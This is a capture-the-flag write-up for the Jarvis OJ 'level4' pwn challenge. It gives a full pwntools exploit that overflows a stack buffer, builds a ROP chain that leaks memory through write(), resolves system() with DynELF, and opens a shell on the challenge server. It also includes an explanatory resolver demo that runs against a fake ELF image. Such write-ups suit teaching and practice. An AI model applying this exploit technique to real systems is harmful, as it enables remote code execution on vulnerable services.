Pwn-level4

Challenge binary

https://dn.jarvisoj.com/challengefiles/level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0


Reference write-up

https://www.anquanke.com/post/id/85129


New technique: using pwntools' DynELF

Approach: the binary has no output function that prints libc addresses and we are not given a libc, so use DynELF to resolve the address of system through a 4-byte leak primitive built from write(); then use read() to write '/bin/sh' into the .bss section, and overflow a third time to call system('/bin/sh') with the argument passed on the stack, giving a shell.


The exploit (EXP) is as follows:

from pwn import *

r = remote('pwn2.jarvisoj.com', 9880)
e = ELF('./level4')

# PLT stubs are usable as return addresses without knowing where libc is loaded
write_plt = e.plt['write']
read_plt = e.plt['read']
func = e.symbols['vulnerable_function']   # return here after each call so the overflow can be reused
bss_addr = 0x804a024                      # writable and at a fixed address (no PIE)
offset = 0x88 + 0x4                       # buffer sits at ebp-0x88, plus 4 bytes of saved ebp


def leak(address):
        # write(1, address, 4), then return into vulnerable_function for the next leak
        payload1 = b'a' * offset + p32(write_plt) + p32(func) + p32(1) + p32(address) + p32(4)
        r.sendline(payload1)
        leak_address = r.recv(4)
        return leak_address


# DynELF only needs leak(): it walks the binary's dynamic section and link_map to find
# libc's base, then parses libc's symbol table in memory, so no libc version is required
d = DynELF(leak, elf=e)
sys_addr = d.lookup('system', 'libc')

# read(0, bss_addr, 8): stage '/bin/sh' in .bss, then return into vulnerable_function again
payload2 = b'a' * offset + p32(read_plt) + p32(func) + p32(0) + p32(bss_addr) + p32(8)
r.sendline(payload2)
r.sendline(b'/bin/sh')                    # '/bin/sh' plus the newline is exactly the 8 bytes read() waits for

# system('/bin/sh'): the 4 filler bytes are system's (unused) return address
payload3 = b'a' * offset + p32(sys_addr) + b'a' * 4 + p32(bss_addr)
r.sendline(payload3)

r.interactive()

read and write take their arguments in the order (fd, addr, len): the file descriptor, the buffer address, and the number of bytes to read or write. In a ROP chain on 32-bit x86 these go on the stack right after the fake return address, in that order.

File descriptor 0 is the standard input stream stdin, and 1 is the standard output stream stdout; that is why the leak calls write with 1 and the '/bin/sh' staging calls read with 0.
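To make clear what d.lookup('system', 'libc') is actually doing behind the leak() function, here is a small DynELF-style resolver written for this page (added example, not the original post's code and not pwntools' implementation). It works exactly as the exploit's primitive does: the only way it touches "process memory" is a leak(addr) that returns 4 bytes. The target memory is a constructed, minimal 32-bit ELF image standing in for a mapped libc at an assumed load address LIBC_BASE; real DynELF additionally finds its first pointer into libc by walking the target binary's dynamic section and link_map, which this demo skips by starting from a pointer that is already inside the fake libc. It uses the SysV DT_HASH table and a linear symbol scan rather than the GNU hash that DynELF also supports.

```python
import struct

PAGE = 0x1000
LIBC_BASE = 0xf7e00000          # assumed load address of the constructed libc
PT_DYNAMIC = 2                  # ELF32 constants, values as in elf.h
DT_NULL, DT_HASH, DT_STRTAB, DT_SYMTAB = 0, 4, 5, 6


def build_fake_libc(names):
    """Constructed ELF32 image: Ehdr, one PT_DYNAMIC phdr, .dynamic, SysV
    hash table, .dynsym, .dynstr. Returns (image, {name: absolute address})."""
    phdr_off, dyn_off = 52, 84
    nsyms = len(names) + 1                       # index 0 is the null symbol
    hash_off = dyn_off + 8 * 4                   # 4 dynamic entries of 8 bytes
    symtab_off = hash_off + 4 * (3 + nsyms)      # nbucket, nchain, bucket[1], chain[n]
    strtab_off = symtab_off + 16 * nsyms
    strtab, syms, addrs = b"\x00", [b"\x00" * 16], {}
    for i, name in enumerate(names, 1):
        st_value = 0x10000 + 0x100 * i           # offset from base, like a real libc
        syms.append(struct.pack("<IIIBBH", len(strtab), st_value, 0x20, 0x12, 0, 1))
        strtab += name.encode() + b"\x00"
        addrs[name] = LIBC_BASE + st_value
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", b"\x7fELF\x01\x01\x01", 3, 3, 1, 0,
                       phdr_off, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<8I", PT_DYNAMIC, dyn_off, dyn_off, dyn_off, 32, 32, 6, 4)
    # ld.so relocates these d_ptr values in place, so in memory they are absolute
    dynamic = b"".join(struct.pack("<II", t, v) for t, v in (
        (DT_HASH, LIBC_BASE + hash_off), (DT_STRTAB, LIBC_BASE + strtab_off),
        (DT_SYMTAB, LIBC_BASE + symtab_off), (DT_NULL, 0)))
    hashtab = struct.pack("<III", 1, nsyms, 0) + b"\x00" * (4 * nsyms)
    return ehdr + phdr + dynamic + hashtab + b"".join(syms) + strtab, addrs


class FakeProcess:
    """Stand-in for the remote target: the image mapped at LIBC_BASE, zero
    bytes elsewhere. leak() is the only way the resolver touches memory."""
    def __init__(self, image):
        self.image, self.leaks = image, 0

    def leak(self, addr):
        """What write(1, addr, 4) in the ROP chain gives us: 4 bytes at addr."""
        self.leaks += 1
        off = addr - LIBC_BASE
        if 0 <= off < len(self.image):
            return self.image[off:off + 4].ljust(4, b"\x00")
        return b"\x00" * 4


def u32(raw):
    return struct.unpack("<I", raw)[0]


class MiniDynELF:
    """Resolve symbols in a loaded ELF through a 4-byte leak alone, in the
    spirit of pwntools' DynELF (simplified: SysV DT_HASH, linear symbol scan)."""
    def __init__(self, leak, libc_pointer):
        self.leak = leak
        # 1. page-align the pointer and walk back until the ELF magic appears
        self.base = libc_pointer & ~(PAGE - 1)
        while self.leak(self.base) != b"\x7fELF":
            self.base -= PAGE
        # 2. program headers -> PT_DYNAMIC -> address of .dynamic
        phoff = u32(self.leak(self.base + 28))
        phentsize = struct.unpack("<HH", self.leak(self.base + 40))[1]
        phnum = struct.unpack("<HH", self.leak(self.base + 44))[0]
        dyn = None
        for i in range(phnum):
            ph = self.base + phoff + i * phentsize
            if u32(self.leak(ph)) == PT_DYNAMIC:
                dyn = self.base + u32(self.leak(ph + 8))   # p_vaddr
        if dyn is None:
            raise ValueError("no PT_DYNAMIC segment")
        # 3. collect the pointer tags; accept relocated or unrelocated d_ptr values
        self.tags = {}
        while True:
            tag, val = u32(self.leak(dyn)), u32(self.leak(dyn + 4))
            if tag == DT_NULL:
                break
            self.tags[tag] = val if val >= self.base else self.base + val
            dyn += 8

    def _string(self, addr):
        buf = b""
        while b"\x00" not in buf:
            buf += self.leak(addr + len(buf))
        return buf.split(b"\x00", 1)[0].decode()

    def lookup(self, name):
        """Return the absolute address of `name`, or None if it is not exported."""
        nsyms = u32(self.leak(self.tags[DT_HASH] + 4))     # nchain == symbol count
        symtab, strtab = self.tags[DT_SYMTAB], self.tags[DT_STRTAB]
        for i in range(1, nsyms):
            sym = symtab + 16 * i
            if self._string(strtab + u32(self.leak(sym))) == name:
                return self.base + u32(self.leak(sym + 4))  # st_value
        return None


if __name__ == "__main__":
    image, addrs = build_fake_libc(["write", "system", "read"])
    proc = FakeProcess(image)
    d = MiniDynELF(proc.leak, addrs["write"])
    print("base", hex(d.base), "system", hex(d.lookup("system")), "leaks used", proc.leaks)
```

The leak counter is the practical point: every 4 bytes costs one full round trip through the overflow, which is why the real exploit returns into vulnerable_function after each write() call, and why DynELF lookups against a remote service take noticeably longer than a single leak of a GOT entry when the libc version is known.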


Origin www.cnblogs.com/gaonuoqi/p/11696550.html